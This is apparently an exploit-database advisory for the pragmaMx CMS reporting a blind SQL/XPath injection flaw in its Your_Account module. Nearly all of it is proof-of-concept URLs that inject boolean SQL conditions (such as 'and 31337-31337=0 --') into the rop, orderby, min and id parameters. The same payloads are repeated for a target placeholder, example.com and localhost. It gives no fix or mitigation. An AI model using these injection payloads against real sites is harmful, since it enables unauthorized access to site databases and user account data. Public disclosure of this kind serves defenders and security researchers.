#############
#
# CMS Name : pragmaMx ( All Version )
#
# Bug Type : Blind SQL/XPath Injection vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download
#

###########################################

PoC :

http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst
http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0

example :

http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0

local Example :

http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst
http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://localhost/html/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
http://localhost/html/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0